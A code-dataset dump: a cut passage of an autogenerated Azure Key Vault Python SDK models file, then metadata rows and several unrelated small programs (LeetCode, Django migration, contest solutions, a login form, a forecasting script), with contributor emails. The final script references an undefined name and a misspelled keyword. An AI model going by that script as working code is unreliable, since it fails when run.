_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"system_data": {"key": "systemData", "type": "SystemData"},
"properties": {"key": "properties", "type": "VaultProperties"},
}
def __init__(
self,
*,
properties: "_models.VaultProperties",
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
**kwargs: Any
) -> None:
"""
:keyword location: Azure location of the key vault resource.
:paramtype location: str
:keyword tags: Tags assigned to the key vault resource.
:paramtype tags: dict[str, str]
:keyword properties: Properties of the vault. Required.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
"""
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.location = location
self.tags = tags
self.system_data = None
self.properties = properties
class VaultAccessPolicyParameters(_serialization.Model):
"""Parameters for updating the access policy in a vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: The resource id of the access policy.
:vartype id: str
:ivar name: The resource name of the access policy.
:vartype name: str
:ivar type: The resource name of the access policy.
:vartype type: str
:ivar location: The resource type of the access policy.
:vartype location: str
:ivar properties: Properties of the access policy. Required.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultAccessPolicyProperties
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"location": {"readonly": True},
"properties": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"location": {"key": "location", "type": "str"},
"properties": {"key": "properties", "type": "VaultAccessPolicyProperties"},
}
def __init__(self, *, properties: "_models.VaultAccessPolicyProperties", **kwargs: Any) -> None:
"""
:keyword properties: Properties of the access policy. Required.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultAccessPolicyProperties
"""
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.location = None
self.properties = properties
class VaultAccessPolicyProperties(_serialization.Model):
"""Properties of the vault access policy.
All required parameters must be populated in order to send to Azure.
:ivar access_policies: An array of 0 to 16 identities that have access to the key vault. All
identities in the array must use the same tenant ID as the key vault's tenant ID. Required.
:vartype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
"""
_validation = {
"access_policies": {"required": True},
}
_attribute_map = {
"access_policies": {"key": "accessPolicies", "type": "[AccessPolicyEntry]"},
}
def __init__(self, *, access_policies: List["_models.AccessPolicyEntry"], **kwargs: Any) -> None:
"""
:keyword access_policies: An array of 0 to 16 identities that have access to the key vault. All
identities in the array must use the same tenant ID as the key vault's tenant ID. Required.
:paramtype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
"""
super().__init__(**kwargs)
self.access_policies = access_policies
class VaultCheckNameAvailabilityParameters(_serialization.Model):
"""The parameters used to check the availability of the vault name.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar name: The vault name. Required.
:vartype name: str
:ivar type: The type of resource, Microsoft.KeyVault/vaults. Required. Default value is
"Microsoft.KeyVault/vaults".
:vartype type: str
"""
_validation = {
"name": {"required": True},
"type": {"required": True, "constant": True},
}
_attribute_map = {
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
}
type = "Microsoft.KeyVault/vaults"
def __init__(self, *, name: str, **kwargs: Any) -> None:
"""
:keyword name: The vault name. Required.
:paramtype name: str
"""
super().__init__(**kwargs)
self.name = name
class VaultCreateOrUpdateParameters(_serialization.Model):
"""Parameters for creating or updating a vault.
All required parameters must be populated in order to send to Azure.
:ivar location: The supported Azure location where the key vault should be created. Required.
:vartype location: str
:ivar tags: The tags that will be assigned to the key vault.
:vartype tags: dict[str, str]
:ivar properties: Properties of the vault. Required.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
"""
_validation = {
"location": {"required": True},
"properties": {"required": True},
}
_attribute_map = {
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"properties": {"key": "properties", "type": "VaultProperties"},
}
def __init__(
self,
*,
location: str,
properties: "_models.VaultProperties",
tags: Optional[Dict[str, str]] = None,
**kwargs: Any
) -> None:
"""
:keyword location: The supported Azure location where the key vault should be created.
Required.
:paramtype location: str
:keyword tags: The tags that will be assigned to the key vault.
:paramtype tags: dict[str, str]
:keyword properties: Properties of the vault. Required.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultProperties
"""
super().__init__(**kwargs)
self.location = location
self.tags = tags
self.properties = properties
class VaultListResult(_serialization.Model):
"""List of vaults.
:ivar value: The list of vaults.
:vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Vault]
:ivar next_link: The URL to get the next set of vaults.
:vartype next_link: str
"""
_attribute_map = {
"value": {"key": "value", "type": "[Vault]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(
self, *, value: Optional[List["_models.Vault"]] = None, next_link: Optional[str] = None, **kwargs: Any
) -> None:
"""
:keyword value: The list of vaults.
:paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Vault]
:keyword next_link: The URL to get the next set of vaults.
:paramtype next_link: str
"""
super().__init__(**kwargs)
self.value = value
self.next_link = next_link
class VaultPatchParameters(_serialization.Model):
"""Parameters for creating or updating a vault.
:ivar tags: The tags that will be assigned to the key vault.
:vartype tags: dict[str, str]
:ivar properties: Properties of the vault.
:vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultPatchProperties
"""
_attribute_map = {
"tags": {"key": "tags", "type": "{str}"},
"properties": {"key": "properties", "type": "VaultPatchProperties"},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
properties: Optional["_models.VaultPatchProperties"] = None,
**kwargs: Any
) -> None:
"""
:keyword tags: The tags that will be assigned to the key vault.
:paramtype tags: dict[str, str]
:keyword properties: Properties of the vault.
:paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.VaultPatchProperties
"""
super().__init__(**kwargs)
self.tags = tags
self.properties = properties
class VaultPatchProperties(_serialization.Model): # pylint: disable=too-many-instance-attributes
"""Properties of the vault.
:ivar tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the key vault.
:vartype tenant_id: str
:ivar sku: SKU details.
:vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
:ivar access_policies: An array of 0 to 16 identities that have access to the key vault. All
identities in the array must use the same tenant ID as the key vault's tenant ID.
:vartype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
:ivar enabled_for_deployment: Property to specify whether Azure Virtual Machines are permitted
to retrieve certificates stored as secrets from the key vault.
:vartype enabled_for_deployment: bool
:ivar enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
permitted to retrieve secrets from the vault and unwrap keys.
:vartype enabled_for_disk_encryption: bool
:ivar enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
permitted to retrieve secrets from the key vault.
:vartype enabled_for_template_deployment: bool
:ivar enable_soft_delete: Property to specify whether the 'soft delete' functionality is
enabled for this key vault. Once set to true, it cannot be reverted to false.
:vartype enable_soft_delete: bool
:ivar enable_rbac_authorization: Property that controls how data actions are authorized. When
true, the key vault will use Role Based Access Control (RBAC) for authorization of data
actions, and the access policies specified in vault properties will be ignored. When false,
the key vault will use the access policies specified in vault properties, and any policy stored
on Azure Resource Manager will be ignored. If null or not specified, the value of this property
will not change.
:vartype enable_rbac_authorization: bool
:ivar soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and <=90.
:vartype soft_delete_retention_in_days: int
:ivar create_mode: The vault's create mode to indicate whether the vault need to be recovered
or not. Known values are: "recover" and "default".
:vartype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
:ivar enable_purge_protection: Property specifying whether protection against purge is enabled
for this vault. Setting this property to true activates protection against purge for this vault
and its content - only the Key Vault service may initiate a hard, irrecoverable deletion. The
setting is effective only if soft delete is also enabled. Enabling this functionality is
irreversible - that is, the property does not accept false as its value.
:vartype enable_purge_protection: bool
:ivar network_acls: A collection of rules governing the accessibility of the vault from
specific network locations.
:vartype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
:ivar public_network_access: Property to specify whether the vault will accept traffic from
public internet. If set to 'disabled' all traffic except private endpoint traffic and that that
originates from trusted services will be blocked. This will override the set firewall rules,
meaning that even if the firewall rules are present we will not honor the rules.
:vartype public_network_access: str
"""
_attribute_map = {
"tenant_id": {"key": "tenantId", "type": "str"},
"sku": {"key": "sku", "type": "Sku"},
"access_policies": {"key": "accessPolicies", "type": "[AccessPolicyEntry]"},
"enabled_for_deployment": {"key": "enabledForDeployment", "type": "bool"},
"enabled_for_disk_encryption": {"key": "enabledForDiskEncryption", "type": "bool"},
"enabled_for_template_deployment": {"key": "enabledForTemplateDeployment", "type": "bool"},
"enable_soft_delete": {"key": "enableSoftDelete", "type": "bool"},
"enable_rbac_authorization": {"key": "enableRbacAuthorization", "type": "bool"},
"soft_delete_retention_in_days": {"key": "softDeleteRetentionInDays", "type": "int"},
"create_mode": {"key": "createMode", "type": "str"},
"enable_purge_protection": {"key": "enablePurgeProtection", "type": "bool"},
"network_acls": {"key": "networkAcls", "type": "NetworkRuleSet"},
"public_network_access": {"key": "publicNetworkAccess", "type": "str"},
}
def __init__(
self,
*,
tenant_id: Optional[str] = None,
sku: Optional["_models.Sku"] = None,
access_policies: Optional[List["_models.AccessPolicyEntry"]] = None,
enabled_for_deployment: Optional[bool] = None,
enabled_for_disk_encryption: Optional[bool] = None,
enabled_for_template_deployment: Optional[bool] = None,
enable_soft_delete: Optional[bool] = None,
enable_rbac_authorization: Optional[bool] = None,
soft_delete_retention_in_days: Optional[int] = None,
create_mode: Optional[Union[str, "_models.CreateMode"]] = None,
enable_purge_protection: Optional[bool] = None,
network_acls: Optional["_models.NetworkRuleSet"] = None,
public_network_access: Optional[str] = None,
**kwargs: Any
) -> None:
"""
:keyword tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the key vault.
:paramtype tenant_id: str
:keyword sku: SKU details.
:paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
:keyword access_policies: An array of 0 to 16 identities that have access to the key vault. All
identities in the array must use the same tenant ID as the key vault's tenant ID.
:paramtype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
:keyword enabled_for_deployment: Property to specify whether Azure Virtual Machines are
permitted to retrieve certificates stored as secrets from the key vault.
:paramtype enabled_for_deployment: bool
:keyword enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
permitted to retrieve secrets from the vault and unwrap keys.
:paramtype enabled_for_disk_encryption: bool
:keyword enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
permitted to retrieve secrets from the key vault.
:paramtype enabled_for_template_deployment: bool
:keyword enable_soft_delete: Property to specify whether the 'soft delete' functionality is
enabled for this key vault. Once set to true, it cannot be reverted to false.
:paramtype enable_soft_delete: bool
:keyword enable_rbac_authorization: Property that controls how data actions are authorized.
When true, the key vault will use Role Based Access Control (RBAC) for authorization of data
actions, and the access policies specified in vault properties will be ignored. When false,
the key vault will use the access policies specified in vault properties, and any policy stored
on Azure Resource Manager will be ignored. If null or not specified, the value of this property
will not change.
:paramtype enable_rbac_authorization: bool
:keyword soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and
<=90.
:paramtype soft_delete_retention_in_days: int
:keyword create_mode: The vault's create mode to indicate whether the vault need to be
recovered or not. Known values are: "recover" and "default".
:paramtype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
:keyword enable_purge_protection: Property specifying whether protection against purge is
enabled for this vault. Setting this property to true activates protection against purge for
this vault and its content - only the Key Vault service may initiate a hard, irrecoverable
deletion. The setting is effective only if soft delete is also enabled. Enabling this
functionality is irreversible - that is, the property does not accept false as its value.
:paramtype enable_purge_protection: bool
:keyword network_acls: A collection of rules governing the accessibility of the vault from
specific network locations.
:paramtype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
:keyword public_network_access: Property to specify whether the vault will accept traffic from
public internet. If set to 'disabled' all traffic except private endpoint traffic and that that
originates from trusted services will be blocked. This will override the set firewall rules,
meaning that even if the firewall rules are present we will not honor the rules.
:paramtype public_network_access: str
"""
super().__init__(**kwargs)
self.tenant_id = tenant_id
self.sku = sku
self.access_policies = access_policies
self.enabled_for_deployment = enabled_for_deployment
self.enabled_for_disk_encryption = enabled_for_disk_encryption
self.enabled_for_template_deployment = enabled_for_template_deployment
self.enable_soft_delete = enable_soft_delete
self.enable_rbac_authorization = enable_rbac_authorization
self.soft_delete_retention_in_days = soft_delete_retention_in_days
self.create_mode = create_mode
self.enable_purge_protection = enable_purge_protection
self.network_acls = network_acls
self.public_network_access = public_network_access
class VaultProperties(_serialization.Model): # pylint: disable=too-many-instance-attributes
"""Properties of the vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the key vault. Required.
:vartype tenant_id: str
:ivar sku: SKU details. Required.
:vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
:ivar access_policies: An array of 0 to 1024 identities that have access to the key vault. All
identities in the array must use the same tenant ID as the key vault's tenant ID. When
``createMode`` is set to ``recover``\ , access policies are not required. Otherwise, access
policies are required.
:vartype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
:ivar vault_uri: The URI of the vault for performing operations on keys and secrets.
:vartype vault_uri: str
:ivar hsm_pool_resource_id: The resource id of HSM Pool.
:vartype hsm_pool_resource_id: str
:ivar enabled_for_deployment: Property to specify whether Azure Virtual Machines are permitted
to retrieve certificates stored as secrets from the key vault.
:vartype enabled_for_deployment: bool
:ivar enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
permitted to retrieve secrets from the vault and unwrap keys.
:vartype enabled_for_disk_encryption: bool
:ivar enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
permitted to retrieve secrets from the key vault.
:vartype enabled_for_template_deployment: bool
:ivar enable_soft_delete: Property to specify whether the 'soft delete' functionality is
enabled for this key vault. If it's not set to any value(true or false) when creating new key
vault, it will be set to true by default. Once set to true, it cannot be reverted to false.
:vartype enable_soft_delete: bool
:ivar soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and <=90.
:vartype soft_delete_retention_in_days: int
:ivar enable_rbac_authorization: Property that controls how data actions are authorized. When
true, the key vault will use Role Based Access Control (RBAC) for authorization of data
actions, and the access policies specified in vault properties will be ignored. When false,
the key vault will use the access policies specified in vault properties, and any policy stored
on Azure Resource Manager will be ignored. If null or not specified, the vault is created with
the default value of false. Note that management actions are always authorized with RBAC.
:vartype enable_rbac_authorization: bool
:ivar create_mode: The vault's create mode to indicate whether the vault need to be recovered
or not. Known values are: "recover" and "default".
:vartype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
:ivar enable_purge_protection: Property specifying whether protection against purge is enabled
for this vault. Setting this property to true activates protection against purge for this vault
and its content - only the Key Vault service may initiate a hard, irrecoverable deletion. The
setting is effective only if soft delete is also enabled. Enabling this functionality is
irreversible - that is, the property does not accept false as its value.
:vartype enable_purge_protection: bool
:ivar network_acls: Rules governing the accessibility of the key vault from specific network
locations.
:vartype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
:ivar provisioning_state: Provisioning state of the vault. Known values are: "Succeeded" and
"RegisteringDns".
:vartype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.VaultProvisioningState
:ivar private_endpoint_connections: List of private endpoint connections associated with the
key vault.
:vartype private_endpoint_connections:
list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionItem]
:ivar public_network_access: Property to specify whether the vault will accept traffic from
public internet. If set to 'disabled' all traffic except private endpoint traffic and that that
originates from trusted services will be blocked. This will override the set firewall rules,
meaning that even if the firewall rules are present we will not honor the rules.
:vartype public_network_access: str
"""
_validation = {
"tenant_id": {"required": True},
"sku": {"required": True},
"hsm_pool_resource_id": {"readonly": True},
"private_endpoint_connections": {"readonly": True},
}
_attribute_map = {
"tenant_id": {"key": "tenantId", "type": "str"},
"sku": {"key": "sku", "type": "Sku"},
"access_policies": {"key": "accessPolicies", "type": "[AccessPolicyEntry]"},
"vault_uri": {"key": "vaultUri", "type": "str"},
"hsm_pool_resource_id": {"key": "hsmPoolResourceId", "type": "str"},
"enabled_for_deployment": {"key": "enabledForDeployment", "type": "bool"},
"enabled_for_disk_encryption": {"key": "enabledForDiskEncryption", "type": "bool"},
"enabled_for_template_deployment": {"key": "enabledForTemplateDeployment", "type": "bool"},
"enable_soft_delete": {"key": "enableSoftDelete", "type": "bool"},
"soft_delete_retention_in_days": {"key": "softDeleteRetentionInDays", "type": "int"},
"enable_rbac_authorization": {"key": "enableRbacAuthorization", "type": "bool"},
"create_mode": {"key": "createMode", "type": "str"},
"enable_purge_protection": {"key": "enablePurgeProtection", "type": "bool"},
"network_acls": {"key": "networkAcls", "type": "NetworkRuleSet"},
"provisioning_state": {"key": "provisioningState", "type": "str"},
"private_endpoint_connections": {
"key": "privateEndpointConnections",
"type": "[PrivateEndpointConnectionItem]",
},
"public_network_access": {"key": "publicNetworkAccess", "type": "str"},
}
def __init__(
self,
*,
tenant_id: str,
sku: "_models.Sku",
access_policies: Optional[List["_models.AccessPolicyEntry"]] = None,
vault_uri: Optional[str] = None,
enabled_for_deployment: Optional[bool] = None,
enabled_for_disk_encryption: Optional[bool] = None,
enabled_for_template_deployment: Optional[bool] = None,
enable_soft_delete: bool = True,
soft_delete_retention_in_days: int = 90,
enable_rbac_authorization: bool = False,
create_mode: Optional[Union[str, "_models.CreateMode"]] = None,
enable_purge_protection: Optional[bool] = None,
network_acls: Optional["_models.NetworkRuleSet"] = None,
provisioning_state: Optional[Union[str, "_models.VaultProvisioningState"]] = None,
public_network_access: str = "enabled",
**kwargs: Any
) -> None:
"""
:keyword tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
requests to the key vault. Required.
:paramtype tenant_id: str
:keyword sku: SKU details. Required.
:paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
:keyword access_policies: An array of 0 to 1024 identities that have access to the key vault.
All identities in the array must use the same tenant ID as the key vault's tenant ID. When
``createMode`` is set to ``recover``\ , access policies are not required. Otherwise, access
policies are required.
:paramtype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
:keyword vault_uri: The URI of the vault for performing operations on keys and secrets.
:paramtype vault_uri: str
:keyword enabled_for_deployment: Property to specify whether Azure Virtual Machines are
permitted to retrieve certificates stored as secrets from the key vault.
:paramtype enabled_for_deployment: bool
:keyword enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
permitted to retrieve secrets from the vault and unwrap keys.
:paramtype enabled_for_disk_encryption: bool
:keyword enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
permitted to retrieve secrets from the key vault.
:paramtype enabled_for_template_deployment: bool
:keyword enable_soft_delete: Property to specify whether the 'soft delete' functionality is
enabled for this key vault. If it's not set to any value(true or false) when creating new key
vault, it will be set to true by default. Once set to true, it cannot be reverted to false.
:paramtype enable_soft_delete: bool
:keyword soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and
<=90.
:paramtype soft_delete_retention_in_days: int
:keyword enable_rbac_authorization: Property that controls how data actions are authorized.
When true, the key vault will use Role Based Access Control (RBAC) for authorization of data
actions, and the access policies specified in vault properties will be ignored. When false,
the key vault will use the access policies specified in vault properties, and any policy stored
on Azure Resource Manager will be ignored. If null or not specified, the vault is created with
the default value of false. Note that management actions are always authorized with RBAC.
:paramtype enable_rbac_authorization: bool
:keyword create_mode: The vault's create mode to indicate whether the vault need to be
recovered or not. Known values are: "recover" and "default".
:paramtype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
:keyword enable_purge_protection: Property specifying whether protection against purge is
enabled for this vault. Setting this property to true activates protection against purge for
this vault and its content - only the Key Vault service may initiate a hard, irrecoverable
deletion. The setting is effective only if soft delete is also enabled. Enabling this
functionality is irreversible - that is, the property does not accept false as its value.
:paramtype enable_purge_protection: bool
:keyword network_acls: Rules governing the accessibility of the key vault from specific network
locations.
:paramtype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
:keyword provisioning_state: Provisioning state of the vault. Known values are: "Succeeded" and
"RegisteringDns".
:paramtype provisioning_state: str or
~azure.mgmt.keyvault.v2021_10_01.models.VaultProvisioningState
:keyword public_network_access: Property to specify whether the vault will accept traffic from
public internet. If set to 'disabled' all traffic except private endpoint traffic and that that
originates from trusted services will be blocked. This will override the set firewall rules,
meaning that even if the firewall rules are present we will not honor the rules.
:paramtype public_network_access: str
"""
super().__init__(**kwargs)
self.tenant_id = tenant_id
self.sku = sku
self.access_policies = access_policies
self.vault_uri = vault_uri
self.hsm_pool_resource_id = None
self.enabled_for_deployment = enabled_for_deployment
self.enabled_for_disk_encryption = enabled_for_disk_encryption
self.enabled_for_template_deployment = enabled_for_template_deployment
self.enable_soft_delete = enable_soft_delete
self.soft_delete_retention_in_days = soft_delete_retention_in_days
self.enable_rbac_authorization = enable_rbac_authorization
self.create_mode = create_mode
self.enable_purge_protection = enable_purge_protection
self.network_acls = network_acls
self.provisioning_state = provisioning_state
self.private_endpoint_connections = None
self.public_network_access = public_network_access
class VirtualNetworkRule(_serialization.Model):
"""A rule governing the accessibility of a vault from a specific virtual network.
All required parameters must be populated in order to send to Azure.
:ivar id: Full resource id of a vnet subnet, such as
'/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
Required.
:vartype id: str
:ivar ignore_missing_vnet_service_endpoint: Property to specify whether NRP will ignore the
check if parent subnet has serviceEndpoints configured.
:vartype ignore_missing_vnet_service_endpoint: bool
"""
_validation = {
"id": {"required": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"ignore_missing_vnet_service_endpoint": {"key": "ignoreMissingVnetServiceEndpoint", "type": "bool"},
}
def __init__(
self,
*,
id: str, # pylint: disable=redefined-builtin
ignore_missing_vnet_service_endpoint: Optional[bool] = None,
**kwargs: Any
) -> None:
"""
:keyword id: Full resource id of a vnet subnet, such as
'/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
Required.
:paramtype id: str
:keyword ignore_missing_vnet_service_endpoint: Property to specify whether NRP will ignore the
check if parent subnet has serviceEndpoints configured.
:paramtype ignore_missing_vnet_service_endpoint: bool
"""
super().__init__(**kwargs)
self.id = id
self.ignore_missing_vnet_service_endpoint = ignore_missing_vnet_service_endpoint
| [
"noreply@github.com"
] | Azure.noreply@github.com |
f7d836cffddca933e0110c1cf6abb4867b2437a0 | a140b45f9f16b74353d15ed573ea765b3fef046d | /algorithms/leet.0703.src.1.py | b36a1c7529c8b932d297432e523a94f045ad3ef2 | [] | no_license | fish-ball/leetcode | 258d4b37f05560d914bcd29f7c54820deeadb33f | 3dfd8f73c65d43cc2766c20700a619141acb927b | refs/heads/master | 2023-05-28T18:32:43.638675 | 2023-05-20T04:25:23 | 2023-05-20T04:25:23 | 31,968,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | import heapq
class KthLargest:
def __init__(self, k: int, nums: List[int]):
self.k = k
heapq.heapify(nums)
self.nums = nums
def add(self, val: int) -> int:
heapq.heappush(self.nums, val)
while len(self.nums) > self.k:
heapq.heappop(self.nums)
return self.nums[0]
# Your KthLargest object will be instantiated and called as such:
# obj = KthLargest(k, nums)
# param_1 = obj.add(val)
| [
"noreply@github.com"
] | fish-ball.noreply@github.com |
a7b2ab6cad42ec68d2b70750712b01acfc831215 | 11dbcc94972a370d92b190cc071826d90ae3ff84 | /conjugation/migrations/0014_auto_20180412_1343.py | 3813e57c26684e4265033d31da78c4628acbf6c0 | [
"Apache-2.0"
] | permissive | 5CORNERS/www.le-francais.ru | ef99b401c24eb7a2b84c04bdf638fc7460e05d81 | ab1a77f99a53b4b66a1c4961c335a288ae38b40d | refs/heads/master | 2023-09-01T15:59:46.534050 | 2023-03-14T15:18:45 | 2023-03-14T15:18:45 | 10,008,050 | 5 | 2 | Apache-2.0 | 2023-08-19T19:17:19 | 2013-05-12T02:06:15 | Python | UTF-8 | Python | false | false | 438 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-04-12 10:43
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('conjugation', '0013_auto_20180412_1321'),
]
operations = [
migrations.RenameField(
model_name='verb',
old_name='no_female',
new_name='masculin_only',
),
]
| [
"anton.dumov@gmail.com"
] | anton.dumov@gmail.com |
4a4ea8d341833f55cde5f4b145d6add741371c2b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02788/s685748566.py | 41028a13b217903ab98ffe4b1a1224e7edb5ce04 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import math
from bisect import bisect_right
n, d, a = map(int, input().split())
x_list = []
max_x = 0
for _ in range(n):
x, h = map(int, input().split())
x -= 1
x_list.append([x, h])
max_x = max(max_x, x)
x_list.sort()
xx = [x[0] for x in x_list]
hh = [x[1] for x in x_list]
ans = 0
accum = [0 for _ in range(n)]
for index, [x, h] in enumerate(x_list):
if index != 0:
accum[index] += accum[index - 1]
cnt = max(math.ceil((hh[index] - accum[index]) / a), 0)
ans += cnt
index_right = bisect_right(xx, xx[index] + (2 * d))
accum[index] += cnt * a
if index_right < n:
accum[index_right] -= cnt * a
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7c5ab14f132e8abc3055cf0b989fb0c5a14bba46 | 926b4949f31b99e68e07fdc5c181becf90870e26 | /BioCrowd/apps/login/forms.py | 04860331c93eb7eb4fb2c786d72126591d52af87 | [] | no_license | bxm156/BioCrowd | a563728212d712bc4bfd2cd4b0204789a0a8cc7b | de407fc1640cccbc5354de0dfeb3586fec792899 | refs/heads/master | 2021-01-13T02:14:14.844716 | 2013-05-15T01:15:04 | 2013-05-15T01:15:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,226 | py | from django.contrib.auth.forms import AuthenticationForm
from django import forms
from crispy_forms.layout import Submit, Layout, Fieldset, Field
from crispy_forms.bootstrap import FormActions
from crispy_forms.helper import FormHelper
class CrispyAuthenticationForm(AuthenticationForm):
username = forms.CharField(max_length=254, label="")
password = forms.CharField(label="", widget=forms.PasswordInput)
remember_me = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(CrispyAuthenticationForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_id = 'id-login'
self.helper.form_method = 'post'
self.helper.form_action = '/login/'
self.helper.form_tag = False
self.helper.layout = Layout(
Field('username', label='', placeholder="Email address", css_class="input-block-level"),
Field('password', label='', placeholder="Password", css_class="input-block-level"),
'remember_me',
Submit('submit', 'Sign in', css_class="btn-large")
)
#self.helper.filter(basestring, greedy=True).wrap(Field, css_class="input-xlarge") | [
"bxm156@case.edu"
] | bxm156@case.edu |
c383e7a60082d7a8dadc8d9296c4db641dfa7a47 | 307d3837d31f9e3728af2b62ca51ebf63fe6ec6b | /hall_of_fame/kimdonghun/[BOJ]2775_IWillBeAWomenPresident.py | e10e3178d5f2338e9e890aeb876d3a082e2d1843 | [] | no_license | ellynhan/challenge100-codingtest-study | 905043497d154b8a7333ca536e536d013f6e7454 | bcdc6d04f13b12ba80b42e066f9d244d7c2cc698 | refs/heads/master | 2023-09-01T14:10:13.481013 | 2023-08-27T14:38:52 | 2023-08-27T14:38:52 | 401,561,230 | 162 | 176 | null | 2023-09-09T14:56:25 | 2021-08-31T03:30:36 | C++ | UTF-8 | Python | false | false | 413 | py | import sys
import math
T = int(sys.stdin.readline())
for i in range(T) :
K = int(sys.stdin.readline())
N = int(sys.stdin.readline())
m_list = [0] * (N+1)
for l in range(N+1) :
m_list[l] = l
for j in range(K) :
for l in range(1, N+1) :
m_list[l] = m_list[l] + m_list[l-1]
#print(m_list)
print(m_list[N])
| [
"wown252@naver.com"
] | wown252@naver.com |
672b5ae11c94cbd93c53a45adbed6015e142ce3e | 3f6088cf1aaaddc18ca1c6f2d5bfc69590941d60 | /Xianyang_dwt/projects/gbrt_multi_step_one_month.py | 1a6086934a4a27dec07cefec4a9b627a52b417ca | [
"MIT"
] | permissive | YX577/MonthlyRunoffForecastByAutoReg | 80038b1b0401d0dbe9b4b67cf531298090815cf7 | 2d66c628141f001e4ffb3dc3b7520a0f0f0ff239 | refs/heads/master | 2022-03-30T10:48:30.165288 | 2020-01-17T02:36:47 | 2020-01-17T02:36:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | import matplotlib.pyplot as plt
import os
root_path = os.path.dirname(os.path.abspath('__file__'))
from variables import multi_step_lags
import sys
sys.path.append(root_path)
from models import multi_step_gbrt
if __name__ == '__main__':
multi_step_gbrt(
root_path=root_path,
station='Xianyang',
decomposer='dwt',
predict_pattern='forecast',
llags_dict = variables['lags_dict'],
model_id=1
)
plt.show()
| [
"zuojianyi@outlook.com"
